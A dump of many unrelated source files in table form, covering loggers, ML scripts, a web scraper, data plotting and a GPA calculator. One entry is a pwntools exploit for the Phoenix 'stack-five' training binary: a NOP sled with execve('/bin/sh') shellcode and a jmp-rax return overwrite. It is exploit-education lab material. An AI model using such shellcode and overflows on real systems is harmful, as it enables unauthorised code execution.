index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,700 | 84a989e209b3ec2637e10f076d83ecc4da6f3e7d | """
Code for getting and configuring a logger for hw5.
"""
import logging
import sys
def get_logger(log_name: str) -> logging.Logger:
"""Returns a logging instance, configured so that all non-filtered messages
are sent to STDOUT.
"""
logger = logging.getLogger(log_name)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('%(asctime)s - %(name)s: %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
|
15,701 | 3d05d12798598f3d640b837ae12068bbb710f3cb | from itertools import product
from time import sleep
def acumulate(tuple):
cont = 0
for i in tuple:
cont+=i
yield cont
piramid = """75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23""".split("\n")
piramid = [[int(j) for j in i.split(" ")] for i in piramid]
values = []
for i in product([0, 1], repeat = 14):
cont = 0
v = acumulate(i)
values.append(sum([piramid[j][next(v)] for j in range(1, len(piramid))]) + 75)
print(max(values))
|
15,702 | 2a0b39d879820107a2016986cf43fc918c829f37 | import numpy as np
import tensorflow as tf
from gensim.test.utils import datapath
from gensim.models import KeyedVectors
from tensorflow.keras import models
from tensorflow.keras import layers
import functions as fun
import attentionLayer as attention
scene_objects = ['helicopter', 'balloon', 'cloud', 'sun', 'lightning', 'rain', 'rocket', 'airplane', 'bouncy',
'slide', 'sandbox', 'grill', 'swing', 'tent', 'table', 'tree', 'tree', 'tree', 'boy', 'girl',
'bear', 'cat', 'dog', 'duck', 'owl', 'snake', 'hat', 'hat', 'hat', 'hat', 'hat', 'hat', 'hat',
'hat', 'glasses', 'glasses', 'pie', 'pizza', 'hotdog', 'ketchup', 'mustard', 'hamburger', 'soda',
'baseball', 'pail', 'ball', 'ball', 'ball', 'ball', 'ball', 'frisbee', 'bat', 'balloons', 'glove',
'shovel', 'racket', 'kite', 'fire']
# Word2Vec
word2vec = KeyedVectors.load_word2vec_format(
datapath("//home/athira/Robotic_Companion/VerbPrediction/word2vec_vectors.bin"), binary=True) # C bin format
'''
LOAD DATA
'''
subjects_train = np.loadtxt('train_subjects.csv', delimiter=',')
dependents_train = np.loadtxt('train_dependents.csv', delimiter=',')
subjects_val = np.loadtxt('val_subjects.csv', delimiter=',')
dependents_val = np.loadtxt('val_dependents.csv', delimiter=',')
y_train = np.loadtxt('train_verbs.csv', delimiter=',')
y_val = np.loadtxt('val_verbs.csv', delimiter=',')
x_train = np.concatenate([subjects_train, dependents_train], axis=1)
x_val = np.concatenate([subjects_val, dependents_val], axis=1)
batch_size = 32
model = models.Sequential()
model.add(layers.Dropout(0.5, input_shape=(600,)))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(512, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(69))
# Selecting the type of loss function and optimizer
model.compile(optimizer='SGD', loss=tf.nn.softmax_cross_entropy_with_logits)
'''
TRAINING THE MODEL
'''
# Checkpoint to save weights at lowest validation loss
checkpoint_filepath = '/tmp/checkpoint'
model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
save_weights_only=True,
monitor='val_loss',
mode='min',
save_best_only=True)
num_epochs = 1000
history = model.fit(x_train, y_train, epochs=num_epochs, batch_size=batch_size, validation_data=(x_val, y_val), callbacks=[model_checkpoint_callback])
# Loading the Best Weights
model.load_weights(checkpoint_filepath)
# Save this Model
model.save_weights('verb_prediction_from_dependent_model')
# Training History
history_dict = history.history
loss_values = history_dict['loss']
val_loss_values = history_dict['val_loss']
num_epochs = len(val_loss_values)
# Plot the loss
fun.plot_loss(num_epochs, loss_values, val_loss_values)
# Calculate Perplexity
model.load_weights('verb_prediction_from_dependent_model') # Load the model
perplexity = fun.calculate_perplexity(x_val, y_val, model)
print("Perplexity: " + str(perplexity))
|
15,703 | ce9fefdd3729eb8710b4ebfc19c0d9152f88197b | import boto3
# Create SQS client
sqs = boto3.client('sqs')
# List SQS queues
response = sqs.list_queues()
print(response['QueueUrls']) |
15,704 | 0dcdcdfcb1dcefcc81a236b9e84f080247caaafb | from __future__ import print_function
import mysql.connector
import requests
import time
import json
from http.cookies import SimpleCookie
from bs4 import BeautifulSoup
##################################
# #
# CONSTANTS #
# #
##################################
# After you set up your mySQL database, alter the information in this
# file.
db_config_file = "../config/db_config.json"
# Log into SA, then copy paste your cookie into this file.
raw_cookie_file = "../config/raw_cookie.txt"
user_agent = {'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2)' +
' AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
add_article = ("INSERT INTO articles"
"(articleID, ticker_symbol, published_date, author_name, title, text, num_likes, includes_symbols)"
"VALUES (%(articleID)s, %(ticker_symbol)s, %(published_date)s, %(author_name)s, %(title)s, %(text)s,"
" %(num_likes)s, %(includes_symbols)s)")
add_comment = ("INSERT INTO comments"
"(articleID, commentID, userID, comment_date, content, parentID, discussionID)"
"VALUES (%(articleID)s, %(commentID)s, %(userID)s, %(comment_date)s, %(content)s, %(parentID)s,"
"%(discussionID)s)")
##################################
# #
# DATA CLASSES #
# #
##################################
class Article:
def __init__(self, _id, a_cookie, a_user_agent):
"""
Initializes all fields with default values then parses the
information from the url.
"""
self._id = _id
self.ticker = ''
self.pub_date = '0001-01-01'
self.author = ''
self.title = ''
self.text = ''
self.includes = ''
self.comments = []
self.valid = True
self._parse_article(a_cookie, a_user_agent)
def _parse_article(self, a_cookie, a_ua):
"""
Parses article info from the given url.
"""
url = "https://seekingalpha.com/article/%s" % self._id
r = safe_request(url, {})
r_login = safe_request(url, a_cookie)
soup_log = BeautifulSoup(r_login.text, 'html.parser')
# Stops process if article invalid
primary_about = soup_log.find_all("a", href=True, sasource="article_primary_about")
if len(primary_about) != 1:
# Excludes non-single-ticker articles
print("Invalid Article")
self.valid = False
return
else:
self.ticker = primary_about[0].text.split()[-1][1:-1]
# Gets all includes and author
about = soup_log.find_all("a", href=True)
for a in about:
if 'sasource' in a.attrs:
if a.attrs['sasource'] == "article_about":
self.includes += a.text + ","
elif a.attrs['sasource'] == "auth_header_name":
self.author += a.text + ","
self.includes = self.includes[:-1]
self.author = self.author[:-1]
self.title = soup_log.find_all('h1')[0].text
self.pub_date = soup_log.find_all('time', itemprop="datePublished")[0]['content'][:10]
# Get Full Article Text
name_box = BeautifulSoup(r.text, 'html.parser').find_all('p')
print(name_box)
try:
disc_idx = list(filter(lambda i: 'id' in name_box[i].attrs and name_box[i]['id'] == 'a-disclosure',
range(len(name_box))))[0]
except IndexError:
disc_idx = len(name_box)
self.text = ''.join(map(lambda x: x.text + "\n", name_box[:disc_idx]))
def json(self):
"""
Returns json representation of an article (for writing
to the database).
"""
if self.valid:
return {
'articleID': self._id,
'ticker_symbol': self.ticker,
'published_date': self.pub_date,
'author_name': self.author,
'title': self.title,
'text': self.text,
'num_likes': 0,
'includes_symbols': self.includes
}
return {}
class Comment:
def __init__(self, article_id, comment):
self.articleID = article_id
self.commentID = comment['id']
self.userID = comment['user_id']
self.date = comment['created_on'][:10]
self.text = comment['content']
self.parentID = comment['parent_id']
self.discussionID = comment['discussion_id']
self.children_ids = comment['children']
def get_children(self):
"""
Recursively returns an array of all the children of the comment.
"""
children = []
for i in self.children_ids:
child = Comment(self.articleID, self.children_ids[i])
children.append(child)
children.extend(child.get_children())
return children
def json(self):
return {
'articleID': self.articleID,
'commentID': self.commentID,
'userID': self.userID,
'comment_date': self.date,
'content': self.text.encode('ascii', errors='ignore').decode(),
'parentID': self.parentID,
'discussionID': self.discussionID
}
##################################
# #
# FILE FUNCTIONS #
# #
##################################
def read_json_file(filename):
"""
Reads a json formatted file.
"""
with open(filename) as f:
try:
data = json.loads(f.read())
except:
data = {}
return data
def write_json_file(json_data, filename):
"""
Writes a json to a file.
"""
try:
str_data = json.dumps(json_data)
with open(filename, "w") as f:
f.write(str_data)
return True
except MemoryError:
return False
def browser_cookie(rawcookie):
cookie = SimpleCookie()
cookie.load(rawcookie)
# reference: https://stackoverflow.com/questions/32281041/converting-cookie-string-into-python-dict
# Even though SimpleCookie is dictionary-like, it internally uses a Morsel object
# which is incompatible with requests. Manually construct a dictionary instead.
cookies = {}
for key, morsel in cookie.items():
cookies[key] = morsel.value
return cookies
def default_cookie():
"""
Gets cookie from the raw cookie file.
"""
with open(raw_cookie_file) as f:
rc = "".join(f.readlines())
return browser_cookie(rc)
def default_db_config():
"""
Gets default database configuration.
"""
return read_json_file(db_config_file)
def safe_request(url, cookie):
"""
Continues trying to make a request until a certain amount of
tries have failed.
"""
count = 0
r = ""
# Adjust this number if a certain amount of failed attempts
# is acceptable
while count < 1:
try:
r = requests.get(url, cookies=cookie, headers=user_agent)
if r.status_code != 200:
print(r.status_code, "blocked")
count += 1
else:
break
except requests.exceptions.ConnectionError:
print("timeout", url)
time.sleep(1)
return r
def get_comment_jsons(article_id, cookie):
"""
Returns all comments for the given article as array of
jsons.
"""
url = "https://seekingalpha.com/account/ajax_get_comments?id=%s&type=Article&commentType=" % article_id
r = safe_request(url, cookie)
comments = []
if r.status_code != 404:
res = json.loads(r.text)
for comment in res['comments'].values():
c = Comment(article_id, comment)
comments.append(c.json())
comments.extend(map(lambda x: x.json(), c.get_children()))
return comments
def try_add_comment(com_jsons, cursor, article_id):
"""
Given array of comment jsons, adds comments to database.
"""
if not com_jsons:
print("\t No comments found for " + article_id)
for c in com_jsons:
try:
cursor.execute(add_comment, c)
except mysql.connector.DatabaseError as err:
if not err.errno == 1062:
print("Wrong Comment Format: " + c["id"])
def try_add_article(art_json, cursor):
"""
Given an article json, tries to write that article to database.
"""
try:
cursor.execute(add_article, art_json)
except mysql.connector.errors.IntegrityError:
print("Duplicate Article")
def try_add_db(art_json, com_jsons, cursor, article_id):
try_add_article(art_json, cursor)
try_add_comment(com_jsons, cursor, article_id)
def gather_mysql_data(article_fn, start=0, stop=None, comments_only=False):
"""
Given a file with Seeking Alpha article ids separated by commas, iterates
through the article ids in the article and records the article and comment
data in the mysql database.
"""
config = default_db_config()
cookie = default_cookie()
cnx = mysql.connector.connect(**config)
cursor = cnx.cursor()
with open(article_fn) as f:
articles = f.read().split(",")
i, total = start+1, float(len(articles))
for a in articles[start: stop]:
if comments_only:
com_jsons = get_comment_jsons(a, cookie)
try_add_comment(com_jsons, cursor, a)
else:
art_json = Article(a, cookie, user_agent).json()
if art_json:
com_jsons = get_comment_jsons(a, cookie)
try_add_db(art_json, com_jsons, cursor, a)
cnx.commit()
print("%0.4f" % (i/total*100), "%\t Article idx:", i-1)
i += 1
cursor.close()
cnx.close()
if __name__ == '__main__':
# Collection has not been updated in a long time so there are some
# aspects of the pipeline that do not seem to work anymore. While
# writing to the database seems fine, getting the full article text seems
# to be not working again.
a = Article("239509", default_cookie(), user_agent)
print(a.json())
# Do NOT run collection of articles before that bug has been fixed because
# you will overwrite your database with the truncated text version of these
# articles.
|
15,705 | fb36dc3de2b8b468cc8fdbeb23c274aa6ebe9d82 | class Film:
def __init__(self, idf, titlu, an, pret, program):
self.id = idf
self.titlu = titlu
self.an = an
self.pret = pret
self.program = program
def setID(self, idf):
"""
Seteaza id-ul filmului cu idf
Date intrare: idf - int
"""
self.id = idf
def setTitlu(self, titlu):
"""
Seteaza titlul-ul filmului cu titlu
Date intrare: titlu - string
"""
self.titlu = titlu
def setAn(self, an):
"""
Seteaza an-ul filmului cu an
Date intrare: an - string de forma dd.mm.yyyy
"""
self.an = an
def setPret(self, pret):
"""
Seteaza pret-ul filmului cu pret
Date intrare: pret - int
"""
self.pret = pret
def setProgram(self, program):
"""
Seteaza program-ul filmului cu program
Date intrare: program - lista de string-uri de forma hh:mm
"""
self.program = program
def getID(self):
"""
Returneaza id-ul filmului
Date iesire: id - int
"""
return self.id
def getTitlu(self):
"""
Returneaza titlul filmului
Date iesire: titlu - string
"""
return self.titlu
def getAn(self):
"""
Returneaza an-ul filmului
Date iesire: an - string de forma dd.mm.yyyy
"""
return self.an
def getPret(self):
"""
Returneaza pret-ul filmului
Date iesire: pret - int
"""
return self.pret
def getProgram(self):
"""
Returneaza program-ul filmului
Date iesire: program - lista de stringuri de forma hh:mm
"""
return self.program
def validProgram(self, program):
"""
Verifica daca programul dat are ore de forma hh:mm
Date intrare: program - lista de ore
Date iesire: True daca are forma corecta, False altfel
"""
try:
for ora in program:
ora, minute = ora.split(":")
ora = int(ora)
minute = int(minute)
if ora >= 0 and ora <= 24 and minute >= 0 and minute < 60:
return True
except:
return False
return False
def valid(self):
"""
Verifica daca filmul este valid
Date iesire: True daca e valid, False altfel
"""
try:
if self.getPret() > 0 and self.getAn() > 0 and self.validProgram(self.getProgram()):
return True
except:
return False
return False
|
15,706 | 0c4c46f1dfa34f190cbbca7ad2a382aa2ef9f274 | from django.db import models
# Create your models here.
class Superheroes(super_heroes.Superheroes):
name = super_heroes.Charfield(max_length=50)
|
15,707 | 61277a9b9dfce6aba6f18e25365a1ad820299aac | def solve(x,tmp):
global N,M,mat
time = 0
for i in range(N):
for j in range(M):
cal = x - mat[i][j]
abso = abs(cal)
if cal < 0 :
tmp += abso
time += 2*abso
elif cal >= 0 :
tmp -= abso
time += abso
if tmp >= 0 :
return time
else :
return 10e9
N, M, B = map(int,input().split())
mat = [ list(map(int,input().split())) for _ in range(N) ]
max_h, min_h = max(max(mat)), min(min(mat))
result1 = 10e9
result2 = -1
for i in range(min_h, max_h+1):
tmp_result = solve(i,B)
if result1 >= tmp_result :
result1 = tmp_result
result2 = max(result2, i)
print(result1, result2)
# def solve(x,y,tmp): #시간초과
# global N,M,mat
# time = 0
# for i in range(N):
# for j in range(M):
# cal = mat[x][y] - mat[i][j]
# abso = abs(cal)
# if cal < 0 :
# tmp += abso
# time += 2*abso
# elif cal >= 0 :
# tmp -= abso
# time += abso
# if tmp >= 0 :
# return time
# else :
# return 10e9
# N, M, B = map(int,input().split())
# mat = [ list(map(int,input().split())) for _ in range(N) ]
# visit = [False for _ in range(257)]
# result1 = 10e9
# result2 = -1
# for i in range(N):
# for j in range(M):
# if visit[mat[i][j]] == False :
# visit[mat[i][j]] = True
# tmp = solve(i,j,B)
# if result1 > tmp :
# result1 = tmp
# result2 = max(result2, mat[i][j])
# print(result1, result2) |
15,708 | 9af20f024a9050dcd156d57e396a376938fde47c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : AwesomeTang
# @File : line_with_shadow.py
# @Version : Python 3.7
# @Time : 2020-11-01 13:05
from pyecharts.charts import *
from pyecharts import options as opts
import random
line_style = {
'normal': {
'width': 4, # 设置线宽
'shadowColor': 'rgba(155, 18, 184, .3)', # 阴影颜色
'shadowBlur': 10, # 阴影大小
'shadowOffsetY': 10, # Y轴方向阴影偏移
'shadowOffsetX': 10, # x轴方向阴影偏移
'curve': 0.5 # 线弯曲程度,1表示不弯曲
}
}
x_data = ["2020/10/{}".format(i + 1) for i in range(30)]
# 随机生成点数据
y_data_1 = [i + random.randint(10, 20) for i in range(len(x_data))]
y_data_2 = [i + random.randint(15, 25) for i in range(len(x_data))]
def line_with_shadow():
line = Line(init_opts=opts.InitOpts(theme='light',
width='1000px',
height='600px'))
line.add_xaxis(x_data)
line.add_yaxis("Android",
y_data_1,
is_symbol_show=False,
is_smooth=True,
# 传入线风格参数
linestyle_opts=line_style)
line.add_yaxis("IOS",
y_data_2,
is_symbol_show=False,
is_smooth=True,
# 传入线风格参数
linestyle_opts=line_style)
line.set_global_opts(title_opts=opts.TitleOpts(title="终端日活趋势"))
return line
if __name__ == '__main__':
chart = line_with_shadow()
chart.render(path='chart_output/line_with_shadow.html')
|
15,709 | c790169ab5e4c81909436f2ad25adfac84dad2f6 | import yaml
from appium import webdriver
from page.po01_mainpagge import MainPage
from page.basepage import BasePage
class App(BasePage):
with open("../datas/desired_caps.yaml", encoding='UTF-8') as f:
caps = yaml.safe_load(f)["wework"]
def start(self):
if self.driver is None:
self.driver = webdriver.Remote("http://localhost:4723/wd/hub", self.caps)
else:
self.driver.launch_app()
self.driver.implicitly_wait(10)
return self
def restart(self):
self.driver.close()
self.driver.launch_app()
return self
def stop(self):
self.driver.quit()
def goto_mainpage(self):
return MainPage(self.driver)
|
15,710 | 2c4181c367faea32797e27cc34e5296266f677db | import serial.tools.list_ports
import numpy
import matplotlib
import cv2
from pyfirmata import Arduino, util
from time import clock, sleep
def wait(lengthMS):
s = clock()
while (clock() - s) * 1000 < lengthMS:
pass
def callback(value):
pass
def setup_trackbars(range_filter):
cv2.namedWindow("Trackbars", 0)
for i in ["MIN", "MAX"]:
v = 0 if i == "MIN" else 255
for j in range_filter:
cv2.createTrackbar("%s_%s" % (j, i), "Trackbars", v, 255, callback)
def setUpArduino():
ports = list(serial.tools.list_ports.comports())
connectedDevice = None
for p in ports:
if 'Arduino' in p[1]:
try:
connectedDevice = Arduino(p[0])
print("Connected to " + str(connectedDevice))
break
except serial.SerialException:
print("Arduino detected but unable to connect to " + p[0])
if connectedDevice is NoneType:
exit("Failed to connect to Arduino")
return connectedDevice
def get_trackbar_values(range_filter):
values = []
for i in ["MIN", "MAX"]:
for j in range_filter:
v = cv2.getTrackbarPos("%s_%s" % (j, i), "Trackbars")
values.append(v)
return values
def processImage(image):
v1_min, v2_min, v3_min, v1_max, v2_max, v3_max = get_trackbar_values('RGB')
thresh = cv2.inRange(image, (v1_min, v2_min, v3_min), (v1_max, v2_max, v3_max))
mask = cv2.inRange(image, (v1_min, v2_min, v3_min), (v1_max, v2_max, v3_max))
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)[-2]
cv2.drawContours(image, cnts, -1, (0,255,0), 1)
return image,cnts
def main():
camera = cv2.VideoCapture(0)
setup_trackbars('RGB')
arduino = setUpArduino()
if(arduino is None):
print("Arduino not connected")
exit()
light = arduino.get_pin("d:5:p")
while True:
ret, image = camera.read()
#Wait for an button press
key = cv2.waitKey(25) & 0xFF
if key == ord("p"):
processedImage, contours = processImage(image)
cv2.imshow("Original", processedImage)
key = cv2.waitKey(0) & 0xFF
if key == ord('p'):
break
elif key == ord('q') or key == 27:
cv2.destroyAllWindows()
camera.release()
continue
elif key == ord('q') or key == 27:
cv2.destroyAllWindows()
camera.release()
break
processedImage , contours = processImage(image)
cv2.imshow("Original", processedImage)
if len(contours) > 0:
c = max(contours, key=cv2.contourArea)
if(cv2.contourArea(c) > 40):
light.write(1)
else:
light.write(0)
else:
light.write(0)
if __name__ == '__main__':
main()
|
15,711 | af3e829ad9f9b34056fb9525510e028622849371 | import pandas as pd
import dask.dataframe as dd
ticker_df = pd.read_csv('../djia_symbols.csv')
ticker_list = ticker_df.symbol.tolist()
# after downloading full dataset directly from Quandl web site
df = dd.read_csv('/home/geoff/Documents/WIKI_PRICES.csv')
df2 = df[df.date >= '2015-01-01']
df2.compute()
df3 = df2[df2.ticker.isin(ticker_list)].compute()
df3['price'] = df3['adj_close']
df3 = df3[['ticker', 'date', 'price']]
df3.to_csv('data_jan2015_mar2018.csv', index=False)
|
15,712 | c2bb3f63e2d27e0dc8323e29609b03823dfd16e3 | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 26 18:44:55 2017
@author: SACHIN
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from sklearn.cross_validation import KFold
from sklearn.metrics import accuracy_score
from sklearn.metrics import log_loss
# reading relvant files
traindata = pd.read_csv('msno_train.csv')
testdata = pd.read_csv('msno_val.csv')
memberdata = pd.read_csv('Members_final_file.csv')
# merging memberfile with train and test set
traindata = pd.merge(left = traindata,right = memberdata ,how = 'left',on=['msno'])
testdata= pd.merge(left = testdata,right = memberdata ,how = 'left',on=['msno'])
# dropping non-relevant features
testdata= testdata.drop('expiration_year',1)
testdata= testdata.drop('expiration_month',1)
testdata= testdata.drop('expiration_day',1)
traindata=traindata.drop('Unnamed: 0',1)
testdata=testdata.drop('Unnamed: 0',1)
testdata= testdata.drop('expiration_year',1)
testdata= testdata.drop('expiration_month',1)
testdata= testdata.drop('expiration_day',1)
traindata=traindata.drop('Unnamed: 0',1)
testdata=testdata.drop('Unnamed: 0',1)
#reading transactions file
traintransdata = pd.read_csv('train_transaction.csv')
# dropping target variable data present in transactions data since its already present in our training set
traintransdata=traintransdata.drop('is_churn',1)
# merging transactions data with train and test set
traindata = pd.merge(left = traindata,right = traintransdata ,how = 'left',on=['msno'])
testdata= pd.merge(left = testdata,right = traintransdata ,how = 'left',on=['msno'])
#deleting variable not in use to free some memory
del traintransdata
#reading userlogs file
userlogsdata = pd.read_csv('allAggregateUsers.csv')
# merging userlogs data with train and test set
traindata = pd.merge(left = traindata,right = userlogsdata ,how = 'left',on=['msno'])
testdata= pd.merge(left = testdata,right = userlogsdata ,how = 'left',on=['msno'])
#deleting variable not in use to free some memory
del userlogsdata
# generating correlation matrix for checking highly correlated features
corrmatrix=traindata[traindata.columns[1:]].corr()
f,ax=plt.subplots(figsize=(20,15))
sns.heatmap(corrmatrix);
# dropping highly correlated features
traindata=traindata.drop('mon_unq',1)
traindata=traindata.drop('tue_unq',1)
traindata=traindata.drop('wed_unq',1)
traindata=traindata.drop('thu_unq',1)
traindata=traindata.drop('mon_100',1)
traindata=traindata.drop('tue_100',1)
traindata=traindata.drop('wed_100',1)
traindata=traindata.drop('thu_100',1)
traindata=traindata.drop('mon_985',1)
traindata=traindata.drop('tue_985',1)
traindata=traindata.drop('wed_985',1)
traindata=traindata.drop('thu_985',1)
traindata=traindata.drop('mon_75',1)
traindata=traindata.drop('tue_75',1)
traindata=traindata.drop('wed_75',1)
traindata=traindata.drop('thu_75',1)
traindata=traindata.drop('mon_25',1)
traindata=traindata.drop('tue_25',1)
traindata=traindata.drop('wed_25',1)
traindata=traindata.drop('thu_25',1)
traindata=traindata.drop('mon_50',1)
traindata=traindata.drop('tue_50',1)
traindata=traindata.drop('wed_50',1)
traindata=traindata.drop('thu_50',1)
testdata=testdata.drop('mon_unq',1)
testdata=testdata.drop('tue_unq',1)
testdata=testdata.drop('wed_unq',1)
testdata=testdata.drop('thu_unq',1)
testdata=testdata.drop('mon_100',1)
testdata=testdata.drop('tue_100',1)
testdata=testdata.drop('wed_100',1)
testdata=testdata.drop('thu_100',1)
testdata=testdata.drop('mon_985',1)
testdata=testdata.drop('tue_985',1)
testdata=testdata.drop('wed_985',1)
testdata=testdata.drop('thu_985',1)
testdata=testdata.drop('mon_75',1)
testdata=testdata.drop('tue_75',1)
testdata=testdata.drop('wed_75',1)
testdata=testdata.drop('thu_75',1)
testdata=testdata.drop('mon_25',1)
testdata=testdata.drop('tue_25',1)
testdata=testdata.drop('wed_25',1)
testdata=testdata.drop('thu_25',1)
testdata=testdata.drop('mon_50',1)
testdata=testdata.drop('tue_50',1)
testdata=testdata.drop('wed_50',1)
testdata=testdata.drop('thu_50',1)
#imputing missing values with 0
traindata = traindata.fillna(0)
testdata = testdata.fillna(0)
#creating train and test variables to train and test the model
train_y=traindata['is_churn']
featuresdata= traindata.drop('is_churn',1)
train_x=featuresdata
test_y=testdata['is_churn']
testfeaturesdata= testdata.drop('is_churn',1)
test_x=testfeaturesdata
# Building RandomForest model
trained_model = RandomForestClassifier(n_estimators=100,n_jobs=-1)
trained_model.fit(train_x.drop('msno',axis=1), train_y)
#getting predictions for testset from RandomForest model buit and fitted
predictions = trained_model.predict(test_x.drop('msno',axis=1))
# Printing the train and test accuracy
print ("Train Accuracy :: ", accuracy_score(train_y, trained_model.predict(train_x.drop('msno',axis=1))))
print ("Test Accuracy :: ", accuracy_score(test_y, predictions))
from collections import OrderedDict
prediction_df = pd.DataFrame(OrderedDict([ ("msno", test_x["msno"]), ("is_churn", predictions) ]))
#Exporting predictions to csv file
prediction_df.to_csv("prediction_split.csv", index=False)
# Generating Prediction probabilities for TestSet from Random Forest model so that it can be used for logloss and Ensembling later
predictionsprob = trained_model.predict_proba(test_x.drop('msno',axis=1))
secondpred= [item[1] for item in predictionsprob]
predictionProbdf = pd.DataFrame(OrderedDict([ ("msno", test_x["msno"]), ("is_churn", secondpred)]))
#Exporting predictions probabilities to csv file
predictionProbdf.to_csv("predictionTestProb_split.csv", index=False)
# Generating Prediction probabilities for TrainSet from Random Forest model so that it can be used for logloss and Ensembling later
predictionsTrainprob = trained_model.predict_proba(train_x.drop('msno',axis=1))
predTrain=trained_model.predict(train_x.drop('msno',axis=1))
secondTrainpred= [itemt[1] for itemt in predictionsTrainprob]
predictionTrainProbdf = pd.DataFrame(OrderedDict([ ("msno", train_x["msno"]), ("is_churn", secondTrainpred)]))
#Exporting predictions probabilities to csv file
predictionTrainProbdf.to_csv("predictionTrainProb_split.csv", index=False)
scoreTest = log_loss(test_y, predictionsprob,labels=["msno","is_churn"])
print(scoreTest)
# Getting logloss from the predictionprobabilities to generate logloss performance measure for Random Forest model built
scoreTrain = log_loss(train_y, predictionsTrainprob,labels=["msno","is_churn"])
print(scoreTrain)
# Generating Feature importance data for Random Forest model built
importances=trained_model.feature_importances_
indices = np.argsort(importances)[::-1]
trainlabels=list(train_x.columns.drop('msno',1))
importanceList=np.array((importances)).tolist()
featureList={}
for i in range(len(trainlabels)):
featureList[trainlabels[i]] = importanceList[i]
# Getting top ten features as per feature importance generated above
vallist = featureList.values()
vallist.sort()
import operator
sorted_d = sorted(featureList.items(), key=operator.itemgetter(1),reverse=True)
# Plotting Feature importance data for Random Forest model built
plt.figure()
plt.rcParams['figure.figsize']=17,12
plt.title("Feature importances")
plt.yticks(range(train_x.shape[1]-1),train_x.columns.drop('msno',1))
plt.barh(indices, importances[indices],
color="b", align="center")
plt.xlim([-1, ])
plt.xlabel('Features importance score')
plt.show()
|
15,713 | 7e8764d79ce9c03130231ba7bb1c98c1c5ebed18 | from pwn import *
bufsize = 136
# 0x0000000000400481: jmp rax;
rop = p64(0x0000000000400481)
shellcode = '\xba\x00\x00\x00\x00\xbe\x00\x00\x00\x00H\x8d=\x07\x00\x00\x00\xb8;\x00\x00\x00\x0f\x05/bin/sh\x00'
payload = "\x90" * (bufsize - len(shellcode)) + shellcode + rop
r = process("/opt/phoenix/amd64/stack-five")
r.recvuntil("\n")
r.sendline(payload)
r.interactive()
|
15,714 | b188b9d221b80d68e2c0a1836c5834143c3056dc | # Muhammad Ibrahim (mi2ye)
age = int(input('How old are you? '))
if age % 2 == 0:
low = (age / 2) + 7
else:
low = ((age - 1) / 2) + 7
high = (age * 2) - 13
print('You can date people between', int(low), 'and', high, 'years old')
|
15,715 | eed59b1966fe4d9f38d688a68bd32fe43343c6d6 | #Joel Feddes
#This program will determine your GPA, credit hours, and quality points per semester. Also, it will tell you what your final quality points, credit hours, and gpa is.
#This program will also tell you if you finished with honors overall, or if you were on the dean's list for a particular semester.
''' gpa is calculated by summing up the quality points of every course you took and then divided by the number of credit hours.
The quality points of a course is the number of credit hours multiplied by the grade numbers (an A is equal to 4).
So if I got an A in this course, I would gain 12 quality points
'''
def report_welcome():
print("*" * 65)
print("Grade Report Tool".center(65))
print("*" * 65)
def find_quality_points_for_course(letter_grade,credit_hours):
if letter_grade == "A":
points = 4
elif letter_grade == "A-":
points = 3.7
elif letter_grade == "B+":
points = 3.3
elif letter_grade == "B":
points = 3
elif letter_grade == "B-":
points = 2.7
elif letter_grade == "C+":
points = 2.3
elif letter_grade == "C":
points = 2
elif letter_grade == "C-":
points = 1.7
elif letter_grade == "D+":
points = 1.3
elif letter_grade == "D":
points = 1
elif letter_grade == "D-":
points = 0.7
else:
points = 0
contribution = points * credit_hours
return contribution
#main
report_welcome()
fname = input("\nEnter the name of your GPA file: ")
fvar = open(fname, "r")
semester_gpa = 0 #gpa for the entire semester.
semester_hours = 0 # Credit hours achieved for the entire semester.
semester_q_points = 0 #Quality points for the entire semester
total_gpa = 0 # Final gpa
total_hours = 0 # Total credit hours taken
total_q_points = 0 # Total quality points achieved
print("\nHere is your grade summary:\n ")
print("%-15s%10s%10s%10s%20s" % ("Semester", "Hours", "Points", "GPA", "Standing"))
print("-" * 65)
for line in fvar:
line = line.strip()
if line == "" and semester_gpa >= 3.5: #this is telling the program what to do when we reach a new line on the list. And providing a semester gpa condition
print("%-15s%10d%10.2f%10.2f%20s" % (semester,semester_hours,semester_q_points,semester_gpa, "DEAN'S LIST"))
total_hours = total_hours + semester_hours
total_q_points = total_q_points + semester_q_points
total_gpa = total_q_points / total_hours
elif line == "" and semester_gpa < 3.5: #this is telling the program what to do when we reach a new line on the list. And providing a semester gpa condition
print("%-15s%10d%10.2f%10.2f" % (semester,semester_hours,semester_q_points,semester_gpa))
total_hours = total_hours + semester_hours
total_q_points = total_q_points + semester_q_points
total_gpa = total_q_points / total_hours
else: #This will split the juicy part of the text into a tab-seperated list.
parts = line.split("\t")
if len(parts) == 2: #This line has the semester period in it at position [1].
semester = parts[1].upper()
semester_gpa = 0 #reset gpa to 0
semester_hours = 0 # reset credit hours to 0
semester_q_points = 0 # reset quality points to 0
else: #Here, I designate which position correlates to what kind of data as well as use mathy things to calculate ungiven data; like quality points.
num_course = parts[0]
course_name = parts[1]
